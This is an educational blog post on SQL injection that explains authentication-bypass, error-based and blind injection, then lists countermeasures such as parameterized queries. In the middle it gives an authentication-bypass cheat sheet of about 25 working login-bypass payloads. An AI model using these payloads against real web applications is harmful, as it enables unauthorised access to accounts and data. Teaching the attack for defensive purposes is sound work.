SQL Injection - Only CyberSecurity

Ethical Hacking Tutorial, Cybersecurity

Breaking

Monday, October 15, 2018

SQL Injection

SQL

SQL (Structured Query Language) is a database management language used to manage databases to perform various operations like create, read, update and delete on the database. SQL is used by database administrators, as well as developers to organize user data properly. Web applications interact with the database server in the form of queries. SQL queries include select, add, insert, update, delete, create, alter and truncate etc.

List of Database software

● MySQL
● Microsoft SQL
● Oracle
● MongoDB
● SQL lite
● Microsoft Access

SQL Injection



The technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution on backend database to retrieve information directly from the database. It is used to gain unauthorized access to the database. SQL Injection is not a vulnerability in database or web server; it is a vulnerability in a web application which occurs due to lack of input validation.

Types of SQL Injection attacks

● Authentication bypass attack
● Error-based SQL Injection
● Blind SQL Injection

Where Can we put the inputs in a website?

  1. URL
  2. Forms
  3. Contact us forms,register forms
  4. Images
  5. Comments section
  6. Header tags 

Authentication bypass attack

The attacker uses this technique to bypass user authentication without providing the valid Username and password and tries to log into a web application with administrative privileges

Authentication Bypass Cheat Sheet
1’ or ‘1’ = ‘1
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin' or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*

Error-based SQL Injection

Error-based SQL injection technique relies on error messages thrown by the database server to obtain information about the structure of the database. In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database. While errors are very useful during the development phase of a web application, they should be disabled on a live site or logged to a file with restricted access instead.



Blind SQL injection

Blind SQL injection is a type of SQL Injection attack that queries the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages but has not mitigated the code that is vulnerable to SQL injection


Countermeasures

● Never trust user input. Sanitize and validate all input fields. Use parameterized statements, separate data from SQL code.
● Reject entries that contain binary data, escape sequences and comment characters.
● Checking the privileges of a user’s connection to the database.
● Use secure hash algorithms to secure user passwords stored in the database.
● Perform source code review before hosting website.

This is all about sql injection and learn more about securing a website from learning how it can be hacked.
For more about sql injection go to exploit-db.com

No comments:

Post a Comment